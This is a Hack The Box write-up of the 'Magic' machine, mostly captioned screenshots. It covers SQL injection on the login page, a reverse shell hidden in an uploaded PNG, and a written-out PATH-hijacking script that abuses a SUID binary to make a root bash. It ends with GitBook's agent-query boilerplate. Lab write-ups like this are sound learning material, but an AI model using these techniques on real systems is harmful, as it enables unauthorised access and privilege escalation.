> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-magic.md).

# HTB - Magic

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fjwo3eSVli4eJwox1uo5m%2Fimage.png?alt=media&amp;token=f1a85980-0d44-42ee-bbbb-3a415ec90861" alt=""><figcaption></figcaption></figure>

clicking on login redirects to the login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F22FnVC8OHaSaZgztEYYs%2Fimage.png?alt=media&amp;token=9219060e-48f1-4b41-8fd3-399c9099f75d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd2NJJLslbeWrgtqRORwm%2Fimage.png?alt=media&amp;token=a843bec3-4678-4644-9504-2d1467216d22" alt=""><figcaption></figcaption></figure>

all the images are stored as some id.

whenever i see a login page the first impression i get is to test for sql injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKV05mmOUvO8opNusOIk4%2Fimage.png?alt=media&amp;token=04420c55-7e77-48a8-b895-a735982b9ea1" alt=""><figcaption></figcaption></figure>

login page is vulnerable to timebased blind injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fw1IWYIDF2EKw19cnfOwd%2Fimage.png?alt=media&amp;token=f307fe05-ce38-468e-a05e-20209603298b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjqJMtAFqIW9zviDGGtz7%2Fimage.png?alt=media&amp;token=ef9b6bfa-0508-4906-a653-e2cbdd99bc38" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJThmQUJDs70alLc2Z7t2%2Fimage.png?alt=media&amp;token=9ce79b1d-92c9-4a50-8b36-a9656b736bda" alt=""><figcaption></figcaption></figure>

jpg,jpeg and png images are allowed to upload.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fe3cZIuV26DpHGlxTwfii%2Fimage.png?alt=media&amp;token=9baa5994-01f5-4190-94d9-e581e4545395" alt=""><figcaption></figcaption></figure>

images are uploaded to the uploads directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fp9ISzjfKLTUFguF7rVlI%2Fimage.png?alt=media&amp;token=b446a073-0110-40f8-ac79-56354343772f" alt=""><figcaption></figcaption></figure>

filtering in place

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVoLB5HGP9GVnHP1jt0pK%2Fimage.png?alt=media&amp;token=0b887d74-5362-4df7-bb24-11d4e874c6a2" alt=""><figcaption></figcaption></figure>

i will try to upload a valid png image and change the content to include a reverse shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FO1JDCtyeFcNLP0b09WfP%2Fimage.png?alt=media&amp;token=af361eec-03c8-403e-aa40-f4b3fe585847" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1BzM49Y9ZxEDKswjOft5%2Fimage.png?alt=media&amp;token=d54b98b9-3479-420b-8958-8adad4150548" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8YX19NpCNfeIaknDB1Ce%2Fimage.png?alt=media&amp;token=a393ccb1-fbb7-446d-9ba2-069f8ea474d7" alt=""><figcaption></figcaption></figure>

## Shell as www-data

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUhmWlG23b4oY3nSl6Ar2%2Fimage.png?alt=media&amp;token=d50864d3-bef8-4371-bc43-69f5741894fc" alt=""><figcaption></figcaption></figure>

database credentials leaked.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdSzpDqwpzATzN8bxLz9i%2Fimage.png?alt=media&amp;token=750dd7d4-39dc-47c7-966d-b03ed8df0395" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBpCdgoxvOxwguMiHZbaP%2Fimage.png?alt=media&amp;token=39c31d22-85cf-4900-ba34-92ee090d8cb4" alt=""><figcaption></figcaption></figure>

i have to port forward port 3306 to access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwkyHyrCkbmCgrPdPn8g3%2Fimage.png?alt=media&amp;token=8ef6ec65-233d-4a97-9e8d-15aa7df7cd3a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyGWI5rxKkkJp2Lvh1oyQ%2Fimage.png?alt=media&amp;token=dfb6d449-d114-41dd-a954-e33372d3bdba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqkYdsaZMxMLfMBRwIw90%2Fimage.png?alt=media&amp;token=c4e0c11d-a509-40aa-96cb-43be1992f28e" alt=""><figcaption></figcaption></figure>

## Shell as Theseus

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdfH9GAQraa2PAhvcbT2y%2Fimage.png?alt=media&amp;token=ef2984d1-a872-4ae1-8572-3b652f3c19d1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFpLcrtpJIuTCTo7OKhHw%2Fimage.png?alt=media&amp;token=baa8ff46-e0bb-4db9-aaf9-c3fc2d132391" alt=""><figcaption></figcaption></figure>

suid bit is set on a custom binary called /bin/sysinfo.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKVhRgwI6MrLw0aX6wBSE%2Fimage.png?alt=media&amp;token=3f2f4dfd-309b-4376-b12c-956ca8efcc77" alt=""><figcaption></figcaption></figure>

the binary does the following.

From the `strings` output, `/bin/sysinfo` is almost certainly a SUID root binary that calls `popen()` on these commands **without absolute paths**:

```
lshw -short
fdisk -l
cat /proc/cpuinfo
free -h
```

It also imports `setuid`, `setgid`, and `popen`. That means you can likely hijack `PATH` and get your own command executed as root.

### Linux Path Hijacking

```bash
mkdir -p ~/bin
cat > ~/bin/lshw <<'EOF'
#!/bin/bash
cp /bin/bash ~/rootbash
chmod +s ~/rootbash
EOF
chmod +x ~/bin/lshw
PATH=~/bin:$PATH /bin/sysinfo
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsQbQIZY2Ltx5fd7Tp00R%2Fimage.png?alt=media&amp;token=09f36e57-1729-4a70-9863-d5d674b04d61" alt=""><figcaption></figcaption></figure>

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbrXHrdtGeypoTQ62228N%2Fimage.png?alt=media&amp;token=d4ddca3d-17a7-4205-af32-662504464323" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-magic.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
